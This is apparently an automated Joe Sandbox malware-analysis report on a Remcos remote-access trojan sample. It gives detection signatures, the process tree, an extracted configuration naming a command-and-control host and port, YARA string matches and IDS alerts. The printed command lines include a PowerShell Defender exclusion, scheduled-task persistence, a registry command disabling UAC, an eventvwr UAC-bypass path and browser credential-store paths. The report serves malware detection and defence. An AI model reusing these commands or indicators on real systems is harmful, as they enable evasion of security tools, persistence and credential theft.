Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nfi2yQDBda.exe

Overview

General Information

Sample name:Nfi2yQDBda.exe
renamed because original name is a hash value
Original sample name:f9b5a6befe0272cfa6fe717ac29a61d76bd340d1c564e179cb65975ac98b1f07.exe
Analysis ID:1588666
MD5:80b1bd15b16559e4bf630c60f7819a84
SHA1:bcd2884bee79ffbc87b63ec96b35478232da4a05
SHA256:f9b5a6befe0272cfa6fe717ac29a61d76bd340d1c564e179cb65975ac98b1f07
Tags:exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Nfi2yQDBda.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\Nfi2yQDBda.exe" MD5: 80B1BD15B16559E4BF630C60F7819A84)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7504 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Nfi2yQDBda.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\Nfi2yQDBda.exe" MD5: 80B1BD15B16559E4BF630C60F7819A84)
  • xjXWSRbLn.exe (PID: 7700 cmdline: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe MD5: 80B1BD15B16559E4BF630C60F7819A84)
    • schtasks.exe (PID: 7900 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xjXWSRbLn.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe" MD5: 80B1BD15B16559E4BF630C60F7819A84)
    • xjXWSRbLn.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe" MD5: 80B1BD15B16559E4BF630C60F7819A84)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["decmainserver.webredirect.org:45682:1"], "Assigned name": "hdyebf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "46875-RPQWNM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000D.00000002.1402490811.0000000000C77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x691e0:$a1: Remcos restarted by watchdog!
        • 0x69738:$a3: %02i:%02i:%02i:%03i
        • 0x69abd:$a4: * Remcos v
        0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6320c:$str_b2: Executing file:
        • 0x64328:$str_b3: GetDirectListeningPort
        • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x63e30:$str_b7: \update.vbs
        • 0x63234:$str_b9: Downloaded file:
        • 0x63220:$str_b10: Downloading file:
        • 0x632c4:$str_b12: Failed to upload file:
        • 0x642f0:$str_b13: StartForward
        • 0x64310:$str_b14: StopForward
        • 0x63dd8:$str_b15: fso.DeleteFile "
        • 0x63d6c:$str_b16: On Error Resume Next
        • 0x63e08:$str_b17: fso.DeleteFolder "
        • 0x632b4:$str_b18: Uploaded file:
        • 0x63274:$str_b19: Unable to delete:
        • 0x63da0:$str_b20: while fso.FileExists("
        • 0x63749:$str_c0: [Firefox StoredLogins not found]
        Click to see the 12 entries
        SourceRuleDescriptionAuthorStrings
        13.2.xjXWSRbLn.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          13.2.xjXWSRbLn.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          13.2.xjXWSRbLn.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          13.2.xjXWSRbLn.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 21 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nfi2yQDBda.exe", ParentImage: C:\Users\user\Desktop\Nfi2yQDBda.exe, ParentProcessId: 7288, ParentProcessName: Nfi2yQDBda.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", ProcessId: 7476, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nfi2yQDBda.exe", ParentImage: C:\Users\user\Desktop\Nfi2yQDBda.exe, ParentProcessId: 7288, ParentProcessName: Nfi2yQDBda.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", ProcessId: 7476, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe, ParentImage: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe, ParentProcessId: 7700, ParentProcessName: xjXWSRbLn.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp", ProcessId: 7900, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Nfi2yQDBda.exe", ParentImage: C:\Users\user\Desktop\Nfi2yQDBda.exe, ParentProcessId: 7288, ParentProcessName: Nfi2yQDBda.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp", ProcessId: 7504, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nfi2yQDBda.exe", ParentImage: C:\Users\user\Desktop\Nfi2yQDBda.exe, ParentProcessId: 7288, ParentProcessName: Nfi2yQDBda.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe", ProcessId: 7476, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Nfi2yQDBda.exe", ParentImage: C:\Users\user\Desktop\Nfi2yQDBda.exe, ParentProcessId: 7288, ParentProcessName: Nfi2yQDBda.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp", ProcessId: 7504, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T03:55:11.482436+010020365941Malware Command and Control Activity Detected192.168.2.74970269.174.98.4845682TCP
            2025-01-11T03:55:33.885387+010020365941Malware Command and Control Activity Detected192.168.2.74983669.174.98.4845682TCP
            2025-01-11T03:55:56.276669+010020365941Malware Command and Control Activity Detected192.168.2.74997669.174.98.4845682TCP
            2025-01-11T03:56:18.681355+010020365941Malware Command and Control Activity Detected192.168.2.74997869.174.98.4845682TCP
            2025-01-11T03:56:41.074547+010020365941Malware Command and Control Activity Detected192.168.2.74997969.174.98.4845682TCP
            2025-01-11T03:57:03.512396+010020365941Malware Command and Control Activity Detected192.168.2.74998069.174.98.4845682TCP
            2025-01-11T03:57:26.076513+010020365941Malware Command and Control Activity Detected192.168.2.74998169.174.98.4845682TCP
            2025-01-11T03:57:48.480858+010020365941Malware Command and Control Activity Detected192.168.2.74998269.174.98.4845682TCP
            2025-01-11T03:58:10.856140+010020365941Malware Command and Control Activity Detected192.168.2.74998369.174.98.4845682TCP
            2025-01-11T03:58:33.231511+010020365941Malware Command and Control Activity Detected192.168.2.74998469.174.98.4845682TCP
            2025-01-11T03:58:55.607671+010020365941Malware Command and Control Activity Detected192.168.2.74998569.174.98.4845682TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["decmainserver.webredirect.org:45682:1"], "Assigned name": "hdyebf", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "46875-RPQWNM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeReversingLabs: Detection: 68%
            Source: Nfi2yQDBda.exeVirustotal: Detection: 81%Perma Link
            Source: Nfi2yQDBda.exeReversingLabs: Detection: 68%
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.42e5e38.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.4458e78.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nfi2yQDBda.exe.439f658.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3807944178.000000000119A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1402490811.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7288, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Nfi2yQDBda.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xjXWSRbLn.exe PID: 7960, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeJoe Sandbox ML: detected
            Source: Nfi2yQDBda.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004315EC
            Source: Nfi2yQDBda.exe, 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_bc223e35-8
            Source: Nfi2yQDBda.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Nfi2yQDBda.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: DLrIR.pdb source: Nfi2yQDBda.exe, xjXWSRbLn.exe.0.dr
            Source: Binary string: DLrIR.pdbSHA256| source: Nfi2yQDBda.exe, xjXWSRbLn.exe.0.dr
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040838E
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004087A0
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00407848
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004068CD FindFirstFileW,FindNextFileW,13_2_004068CD
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0044BA59 FindFirstFileExA,13_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406D28

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49702 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49976 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49980 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49981 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49982 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49985 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49983 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49836 -> 69.174.98.48:45682
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49984 -> 69.174.98.48:45682
            Source: Malware configuration extractorURLs: decmainserver.webredirect.org
            Source: global trafficTCP traffic: 69.174.98.48 ports 2,4,5,6,8,45682
            Source: global trafficTCP traffic: 192.168.2.7:49702 -> 69.174.98.48:45682
            Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_0041936B
            Source: global trafficDNS traffic detected: DNS query: decmainserver.webredirect.org
            Source: xjXWSRbLn.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: Nfi2yQDBda.exe, 00000000.00000002.1365608505.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Nfi2yQDBda.exe, 00000000.00000002.1365608505.0000000004357000.00000004.00000800.00020000.00000000.sdmp, xjXWSRbLn.exe, 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: Nfi2yQDBda.exe, 00000000.00000002.1364332294.0000000003303000.00000004.00000800.00020000.00000000.sdmp, xjXWSRbLn.exe, 00000008.00000002.1405900840.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000013_2_00409340
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_00414EC1
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,13_2_00409468

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 13.2.xjXWSRbLn.exe.400000.0.unpack, type: UNPACKEDPE
